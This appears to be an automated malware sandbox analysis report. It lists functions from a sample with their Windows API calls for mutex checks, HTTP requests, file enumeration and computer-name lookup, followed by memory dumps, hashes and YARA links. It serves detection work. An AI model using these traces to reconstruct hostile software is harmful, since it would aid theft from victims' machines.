Function 00056AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00CE8950,?,0006110C,?,00000000,?,00061110,?,00000000,00060AEF), ref: 00056ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00056AE8
CloseHandle.KERNEL32(00000000), ref: 00056AF9
Sleep.KERNEL32(00001770), ref: 00056B04
CloseHandle.KERNEL32(?,00000000,?,00CE8950,?,0006110C,?,00000000,?,00061110,?,00000000,00060AEF), ref: 00056B1A
ExitProcess.KERNEL32 ref: 00056B22

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 509eaeac29049ebabca6145b4e1137a6611076d8747be1f113ab4c2838a543a2
Instruction ID: 73b0c3adbf2174a7cf530fed1ec96d37de6731f7b1a7373eada0551d60d2656c
Opcode Fuzzy Hash: 509eaeac29049ebabca6145b4e1137a6611076d8747be1f113ab4c2838a543a2
Instruction Fuzzy Hash: F2F03A74A40219AAF710ABA0EC1EBBFBA74EB04702F904515BD03A2592DFB15548DA67

Function 000447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00044839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00044849

Strings

<, xrefs: 000447C9

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 119e7c9cf1aa1b97b0c84a1775b383349500866fb941a73711b9fe6de8fab62b
Instruction ID: b12c75d857b69290e8cc2d72849523bf0ac438246cd759c21a8efe21c8a01b9a
Opcode Fuzzy Hash: 119e7c9cf1aa1b97b0c84a1775b383349500866fb941a73711b9fe6de8fab62b
Instruction Fuzzy Hash: 11216DB1D00209ABDF10DFA4EC49ADEBB74FB05320F008625F925A72D1EB706A09CF81

Function 000551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Part of subcall function 00046280: InternetOpenA.WININET(00060DFE,00000001,00000000,00000000,00000000), ref: 000462E1
Part of subcall function 00046280: StrCmpCA.SHLWAPI(?,00CEF068), ref: 00046303
Part of subcall function 00046280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00046335
Part of subcall function 00046280: HttpOpenRequestA.WININET(00000000,GET,?,00CEEA28,00000000,00000000,00400100,00000000), ref: 00046385
Part of subcall function 00046280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000463BF
Part of subcall function 00046280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000463D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00055228

Strings

ERROR, xrefs: 0005521A
ERROR, xrefs: 00055273

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: cd935cdec542b43ffff62446a206541a3de56cbd13abe15dcd963dda87f176b3
Instruction ID: f9b7b4ee4c82da7689e0536e7bb7a10bcb7c5646d639a4a33310549b1903f561
Opcode Fuzzy Hash: cd935cdec542b43ffff62446a206541a3de56cbd13abe15dcd963dda87f176b3
Instruction Fuzzy Hash: F7111F70A00008A6DB14FF60DD56AEE7738AF55301F404264FD1A4A593EF706B0DC792

Function 00054F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00058DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00058E0B

lstrcat.KERNEL32(?,00000000), ref: 00054F7A
lstrcat.KERNEL32(?,00061070), ref: 00054F97
lstrcat.KERNEL32(?,00CE8820), ref: 00054FAB
lstrcat.KERNEL32(?,00061074), ref: 00054FBD

Part of subcall function 00054910: wsprintfA.USER32 ref: 0005492C
Part of subcall function 00054910: FindFirstFileA.KERNEL32(?,?), ref: 00054943

Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,00060FDC), ref: 00054971
Part of subcall function 00054910: StrCmpCA.SHLWAPI(?,00060FE0), ref: 00054987
Part of subcall function 00054910: FindNextFileA.KERNEL32(000000FF,?), ref: 00054B7D
Part of subcall function 00054910: FindClose.KERNEL32(000000FF), ref: 00054B92

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 9409a1822bc6e15a67d068004fea364b335c8b304a564d365f668e946e793399
Instruction ID: d705b6d202bb6b5e49ef54429304158c1b4cb3719192a22e8bc7f690091ccfc1
Opcode Fuzzy Hash: 9409a1822bc6e15a67d068004fea364b335c8b304a564d365f668e946e793399
Instruction Fuzzy Hash: 0421FFBA900204A7D754FBB0EC4AEEE333DA754300F404559BA4997182EE7497CCCBA3

Function 00050740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CE8790), ref: 0005079A
StrCmpCA.SHLWAPI(00000000,00CE86C0), ref: 00050866
StrCmpCA.SHLWAPI(00000000,00CE8710), ref: 0005099D

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e5fcc1d0054b624f73eef6fa8fb137a23abc2f50c1436d5dbf46816f5245a88a
Instruction ID: c833205df7d3d4bfa6638d664f0ebcb8d0926c14b7ef577aa714b0e1225a1af9
Opcode Fuzzy Hash: e5fcc1d0054b624f73eef6fa8fb137a23abc2f50c1436d5dbf46816f5245a88a
Instruction Fuzzy Hash: E8913775B101089FDB28EF64D995AEE77B5BF95300F508529E8099F242DF309A09CB92

Function 00050765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00CE8790), ref: 0005079A
StrCmpCA.SHLWAPI(00000000,00CE86C0), ref: 00050866
StrCmpCA.SHLWAPI(00000000,00CE8710), ref: 0005099D

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: ee592f00b542d153c82dbbe2d6c69459eb617d2166324913b9fc225d909e54db
Instruction ID: 96be1ba897d3a0cd642cb018af2684d7235a7cc3b2ba5746a8240628f7a00d0b
Opcode Fuzzy Hash: ee592f00b542d153c82dbbe2d6c69459eb617d2166324913b9fc225d909e54db
Instruction Fuzzy Hash: 4E815875B102089FCF18EF64D995AEEB7B5FF95300F508519E8099F252DB30AA09CB92

Function 000570D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 140COMMON

Download Yara Rule

Strings

6G#h&'?, xrefs: 000570D9
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0005718C

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$6G#h&'?
API String ID: 3722407311-218147891
Opcode ID: aa4b2d4fda4f6a0dbe83c259ed64a1960d4e52caf6cbb9148b57d0c7df34fe2a
Instruction ID: 659b237e6d176c2c6178ea3dd3aa90b623015931e60d497b44eaa5d9c65ce420
Opcode Fuzzy Hash: aa4b2d4fda4f6a0dbe83c259ed64a1960d4e52caf6cbb9148b57d0c7df34fe2a
Instruction Fuzzy Hash: A1516FB0D042089BDB64EBA4DC45BEFB3B4AF44301F5041A8EA0976182EB746E8DDF59

Function 000578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057910
RtlAllocateHeap.NTDLL(00000000), ref: 00057917
GetComputerNameA.KERNEL32(?,00000104), ref: 0005792F

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
